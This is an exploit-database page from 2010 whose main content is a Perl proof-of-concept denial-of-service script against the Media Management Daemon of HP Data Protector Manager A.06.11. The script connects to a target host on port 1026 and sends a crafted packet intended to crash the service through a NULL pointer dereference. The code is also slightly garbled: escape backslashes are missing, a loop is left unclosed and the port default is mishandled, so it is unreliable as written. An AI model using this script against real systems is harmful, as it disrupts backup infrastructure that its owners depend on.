[dos / poc] - HP Data Protector Manager A.06.11 NULL Pointer
Posted on 01 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>HP Data Protector Manager A.06.11 NULL Pointer Dereference DoS | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='HP Data Protector Manager A.06.11 NULL Pointer Dereference DoS by Pepelux in dos / poc | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===================================================================== HP Data Protector Manager A.06.11 NULL Pointer Dereference Remote DoS ===================================================================== #!/usr/bin/perl # ================================= # HP Data Protector Manager A.06.11 # ================================= # # Bug: NULL Pointer Dereference Remote Denial of Service Vulnerability # # Software: http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html # # Date: 30/11/2010 # Author: Pepelux - pepelux[AT]enye-sec[DOT]com # http://www.enye-sec.org - http://www.pepelux.org # # Service: mmd.exe (Media Management Daemon) # Vulnerable file: Program FilesOmniBackinMSVCR71.dll # # MSVCR71.dll:7c350428 mov ax,[edx] caused access violation # when attempting to read from 0x00000000 # # Tested on Windows XP SP2 use IO::Socket; my ($server, $port) = @ARGV ; unless($ARGV[0] || $ARGV[1]) { print "Usage: perl $0 <host> [port] "; print " default port = 1026 "; exit 1; } $port = 1026 if ($ARGV[0]); my $buf = "x00x00x00x43xfexffx00x32x00x36x00x37x00x00x41x41". "x00x31x00x00x42x42x00x31x00x00x43x43x00x31x00x00". "x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44". "x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44". "xabx7bxdex7cx46x4fx4f"; print "[+] Connecting to $server:$port ... "; my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available. "); while(1) { print "[+] Sending malicious packet ... "; print $sock1 "$buf"; print " [x] Server crashed! "; exit; # <a href='http://1337db.com/'>1337db.com</a> [2010-12-01]</pre></body></html>